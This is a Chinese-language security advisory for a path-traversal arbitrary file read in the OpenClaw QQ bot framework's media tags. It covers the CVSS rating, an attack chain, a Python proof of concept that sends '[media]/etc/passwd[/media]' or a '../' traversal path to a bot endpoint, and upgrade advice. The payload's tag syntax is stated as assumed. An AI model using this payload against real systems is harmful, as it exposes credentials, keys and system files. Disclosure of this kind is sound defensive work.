CVE-2026-43533 OpenClaw任意文件读取漏洞

漏洞信息

漏洞编号

CVE-2026-43533

漏洞类型

任意文件读取

CVSS评分

8.6 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw是一款用于QQ机器人开发的框架。在2026.4.10版本之前，OpenClaw存在一个严重的安全漏洞，该漏洞位于QQBot媒体标签的处理逻辑中。攻击者可以利用此漏洞绕过预期的媒体存储边界，引用主机上的任意本地路径。通过精心构造包含恶意媒体标签的回复文本，攻击者能够触发出站媒体处理机制，从而导致服务器上的任意本地文件被读取和泄露。该漏洞无需用户交互且无需认证即可被利用，对系统机密性构成严重威胁。

技术细节

该漏洞的根本原因在于OpenClaw在处理QQBot的媒体标签时，未对用户输入的文件路径进行严格的校验或沙箱限制，导致出现了路径遍历漏洞。在正常业务逻辑中，媒体标签应当仅限于访问预定义的媒体存储目录，以确保文件访问的安全性。然而，在2026.4.10之前的版本中，系统未能正确解析和过滤文件路径参数。攻击者可以利用这一缺陷，在发送给机器人的回复文本中精心构造包含路径遍历序列（如../）或绝对路径的恶意媒体标签。当OpenClaw实例处理这条包含恶意标签的消息时，其底层的出站媒体处理组件会直接根据标签中的路径读取文件内容，并将其作为媒体资源返回给请求方。由于缺乏有效的访问控制列表（ACL）或Chroot限制，攻击者可以借此读取服务器上的任意敏感文件，包括但不限于应用程序配置文件、数据库凭证、私钥或系统关键文件。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在使用OpenClaw框架，且版本低于2026.4.10。

STEP 2

武器化

攻击者构造包含恶意媒体标签的文本载荷，在标签中插入目标敏感文件的路径（如/etc/passwd）。

STEP 3

交付

攻击者通过QQ客户端向受影响的OpenClaw机器人发送包含恶意载荷的消息。

STEP 4

利用

OpenClaw机器人处理该消息，解析媒体标签，并读取指定的本地文件路径。

STEP 5

窃取

机器人将读取到的文件内容作为媒体资源返回给攻击者，完成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-43533: OpenClaw Arbitrary File Read via Media Tags
# This script demonstrates how to craft a malicious message to read local files.

def send_exploit(target_url, file_path):
    """
    Sends a malicious payload to the OpenClaw QQBot endpoint.
    
    :param target_url: The API endpoint of the vulnerable OpenClaw instance.
    :param file_path: The absolute path or path traversal sequence to the target file (e.g., '/etc/passwd').
    """
    # Craft the malicious reply text containing the media tag.
    # The specific tag syntax depends on the implementation, assuming a standard [media]tag format.
    payload = {
        "reply_text": f"Here is the image you requested: [media]{file_path}[/media]"
    }

    try:
        print(f"[*] Sending payload to {target_url} to read {file_path}...")
        response = requests.post(target_url, json=payload)
        
        if response.status_code == 200:
            print("[+] Payload sent successfully.")
            print("[+] Check the bot's outbound response or media channel for the leaked file content.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(response.text)
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Example configuration
    TARGET = "http://localhost:8080/api/v1/message/reply"
    TARGET_FILE = "/etc/passwd" 
    # or use path traversal: "../../../../../../../../etc/passwd"
    
    send_exploit(TARGET, TARGET_FILE)

影响范围

OpenClaw < 2026.4.10

防御指南

临时缓解措施

建议立即升级OpenClaw至2026.4.10或更高版本以彻底修复此漏洞。如果无法立即升级，应实施网络访问控制列表（ACL）来限制对机器人API的访问来源，仅允许受信任的IP地址进行交互，从而降低被恶意利用的风险。